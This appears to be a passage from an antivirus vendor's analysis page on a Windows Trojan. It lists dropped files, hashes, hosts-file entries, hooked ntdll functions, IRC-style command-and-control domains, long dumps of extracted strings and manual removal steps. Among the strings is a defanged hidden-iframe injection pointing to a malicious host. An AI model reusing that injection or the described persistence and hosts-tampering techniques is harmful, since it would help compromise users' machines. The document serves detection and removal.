4f80092d9684d0d505244383f2b0c610 c:\Users\"%CurrentUserName%"\peaab.usr
fad3edffc450964234e51d8006a6fd41 c:\Users\"%CurrentUserName%"\pyyog.exe
6d936ba5cb5ea8d5832144735a63b539 c:\Users\"%CurrentUserName%"\tiaikar.exe
5228e16169afe9388afe27a6e3c795b9 c:\Users\"%CurrentUserName%"\tiaot.exe
11e2fbac741397aa1f144879b69feeff c:\Users\"%CurrentUserName%"\yoosex.exe
4477f345e43b80c8cff14f24089fddfd c:\Users\"%CurrentUserName%"\zebex.exe
5c7536ce607ab7e2779997b19d70ef19 c:\Users\"%CurrentUserName%"\zmloof.exe
cafa7eb8bd07909be2fc354744b6d62e c:\e046c539bd9731dbdf5471f28abfefe3.usr

HOSTS file anomalies

The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses.
The modified file is 864 bytes in size. The following strings are added to the hosts file listed below:

127.0.0.1 jL.chura.pl
127.0.0.1 validation.sls.microsoft.com


Rootkit activity

The Trojan installs the following user-mode hooks in ntdll.dll:

NtQueryInformationProcess
ZwOpenFile
NtDeviceIoControlFile
ZwCreateUserProcess
ZwCreateProcessEx
NtCreateProcess
ZwCreateFile

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
4096 16384 6656 5.29846 4cee79ac2671e36829d0bb610df5b052
.rsrc 20480 102400 102400 3.05157 7b8b82c4183cc46e59615e0e6fcd8f14
petite 122880 379 512 2.83683 d9152af36e3787ad41768ba5d11906da

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
ns1.spansearcher.net 192.42.119.41
ns1.player1352.net 192.42.119.41
ns1.player1352.org
ns1.spinsearcher.org
time.windows.com
sys.zief.pl
core.ircgalaxy.pl
dns.msftncsi.com
teredo.ipv6.microsoft.com


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_452:

`.rsrc
D$(PSSh
ccRegVfy.exe
ccApp.exe
IEXPLORE.EXE
windows
\*.exe
.text
.data
.rsrc
msvcrt.dll
KERNEL32.dll
nddeapir.pdb
_acmdln
m.Zw%
ADVAPI32.DLL
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoysys.zief.pl
core.ircgalaxy.pl
NICK avabcadz
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>
KERNEL32.DLL
windowsupdate
drweb
user32.dll
kernel32.dll
MSVCIRT.dll
MSVCRT.dll
5.1.2600.0 (xpclient.010817-1148)
NDDEAPIR.EXE
Windows
Operating System
5.1.2600.0

%original file name%.exe_452_rwx_00401000_00002000:

D$(PSSh

%original file name%.exe_452_rwx_00419000_00005000:

ADVAPI32.DLL
\USERINIT.EXE
%s:*:enabled:@shell32.dll,-1
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Qoysys.zief.pl
core.ircgalaxy.pl
NICK avabcadz
SFC.DLL
SFC_OS.DLL
USER32.DLL
SHLWAPI.DLL
WSOCK32.DLL
WININET.DLL
%.6x . . :%c%.8x%x %s
JOIN
127.0.0.1 jL.chura.pl
#<iframe src="hXXp://jL.chura.pl/rc/" style="width:1px;height:1px"></iframe>
KERNEL32.DLL
windowsupdate
drweb

e046c539bd9731dbdf5471f28abfefe3.usr_2372:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

SearchProtocolHost.exe_1652:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_3656:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610

peaab.exe_3032:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

jxqol.usr_2056:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

zebex.exe_2016:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

tiaikar.exe_2644:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

gomoz.exe_364:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

tiaot.exe_1980:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

ngqey.exe_2220:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

yoosex.exe_2204:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

zmloof.exe_3272:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

kpwod.exe_3804:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

laudew.exe_1532:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

gmras.exe_2132:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

pyyog.exe_772:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

balab.exe_3320:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

naezuid.exe_3280:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

haeusa.exe_3948:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

caqap.exe_2416:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

gaejoa.exe_1564:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

tiisoh.exe_3180:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

qnsaog.exe_1748:

.text
`.data
.rsrc
MSVBVM60.DLL
uGeXEN
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

boohu.exe_1796:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net

soeejac.exe_1668:

.text
`.data
.rsrc
MSVBVM60.DLL
CHARTWIZ.OCX
MSChartWiz.SubWizard
VBA6.DLL
HotSpots.dll
HotSpotsChrome
HotSpotsMonochrome
HotSpotsShift
a%Program Files%\Microsoft Visual Studio\VB98\Wizards\CHARTWIZ.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
.AdqZ%P
.IfmZIR
%fP$s
352.net


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    ntvdm.exe:3432
    jxqol.exe:4052

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\naezuid.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\tiaot.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\caqap.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\qnsaog.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\peaab.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\balab.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\kpwod.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\haeusa.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\gomoz.exe (922437 bytes)
    C:\Users\"%CurrentUserName%"\gaejoa.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsAC9.tmp (335 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\scsADA.tmp (269 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Reader9\Setup.exe (444160 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Adobe\Reader 9.3\Setup Files\Setup.exe (408872 bytes)
    C:\e046c539bd9731dbdf5471f28abfefe3.usr (145155 bytes)
    C:\Windows\USR_Shohdi_Photo_USR.exe (6889123 bytes)
    C:\Windows\System32\USR_Shohdi_Photo_USR.rsu (45796 bytes)
    C:\Users\"%CurrentUserName%"\jxqol.exe (252752 bytes)
    C:\Users\"%CurrentUserName%"\jxqol.usr (145155 bytes)
    C:\Users\"%CurrentUserName%"\zebex.exe (922437 bytes)
    C:\Users\"%CurrentUserName%"\tiaikar.exe (922437 bytes)
    C:\Users\"%CurrentUserName%"\laudew.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\ngqey.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\tiisoh.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\pyyog.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\yoosex.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\gmras.exe (922290 bytes)
    C:\Users\"%CurrentUserName%"\zmloof.exe (922290 bytes)

  5. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "naezuid" = "C:\Users\"%CurrentUserName%"\naezuid.exe /X"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "tiaot" = "C:\Users\"%CurrentUserName%"\tiaot.exe /P"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "caqap" = "C:\Users\"%CurrentUserName%"\caqap.exe /Y"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "qnsaog" = "C:\Users\"%CurrentUserName%"\qnsaog.exe /V"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "peaab" = "C:\Users\"%CurrentUserName%"\peaab.exe /A"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "balab" = "C:\Users\"%CurrentUserName%"\balab.exe /D"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "kpwod" = "C:\Users\"%CurrentUserName%"\kpwod.exe /k"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "haeusa" = "C:\Users\"%CurrentUserName%"\haeusa.exe /m"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "gomoz" = "C:\Users\"%CurrentUserName%"\gomoz.exe /r"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "gaejoa" = "C:\Users\"%CurrentUserName%"\gaejoa.exe /T"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "zebex" = "C:\Users\"%CurrentUserName%"\zebex.exe /G"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "jxqol" = "C:\Users\"%CurrentUserName%"\jxqol.exe /v"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "tiaikar" = "C:\Users\"%CurrentUserName%"\tiaikar.exe /I"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "laudew" = "C:\Users\"%CurrentUserName%"\laudew.exe /h"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "ngqey" = "C:\Users\"%CurrentUserName%"\ngqey.exe /P"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "tiisoh" = "C:\Users\"%CurrentUserName%"\tiisoh.exe /y"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "pyyog" = "C:\Users\"%CurrentUserName%"\pyyog.exe /z"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "yoosex" = "C:\Users\"%CurrentUserName%"\yoosex.exe /E"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "gmras" = "C:\Users\"%CurrentUserName%"\gmras.exe /k"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "zmloof" = "C:\Users\"%CurrentUserName%"\zmloof.exe /u"

  6. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  7. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  8. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now